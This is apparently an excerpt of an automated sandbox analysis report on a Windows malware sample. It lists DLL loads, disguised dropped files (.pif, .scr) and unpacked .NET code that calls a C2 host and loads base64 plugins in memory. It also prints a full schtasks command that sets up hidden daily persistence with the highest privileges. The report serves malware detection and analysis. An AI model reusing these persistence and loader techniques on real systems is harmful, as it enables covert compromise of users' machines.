                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: DA92phBHUS.exeStatic file information: File size 3145765 > 1048576
                Source: DA92phBHUS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
                Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs.Net Code: Memory
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs.Net Code: Memory
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                Source: DA92phBHUS.exeStatic PE information: real checksum: 0xc6020 should be: 0x3088dd
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E68B75 push ecx; ret 10_2_00E68B88
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00318B75 push ecx; ret 18_2_00318B88
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0030CBDB push eax; retf 18_2_0030CBF8
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0030CC06 push eax; retf 18_2_0030CBF8

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifFile created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\438799\Dump.pifJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifFile created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifFile created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\438799\Dump.pifJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EC59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00EC59B3
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E55EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00E55EDA
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_003759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,18_2_003759B3
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00305EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,18_2_00305EDA
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E633B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00E633B7
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
